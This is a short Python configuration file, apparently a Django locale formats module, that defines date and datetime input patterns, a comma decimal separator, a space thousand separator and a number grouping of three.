# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = [
'%d.%m.%Y', '%d.%m.%y', # '25.10.2006', '25.10.06'
'%y-%m-%d', # '06-10-25'
# '%d. %B %Y', '%d. %b. %Y', # '25. October 2006', '25. Oct. 2006'
]
DATETIME_INPUT_FORMATS = [
'%d.%m.%Y %H:%M:%S', # '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M:%S.%f', # '25.10.2006 14:30:59.000200'
'%d.%m.%Y %H:%M', # '25.10.2006 14:30'
'%d.%m.%Y', # '25.10.2006'
]
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = ' '
NUMBER_GROUPING = 3
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.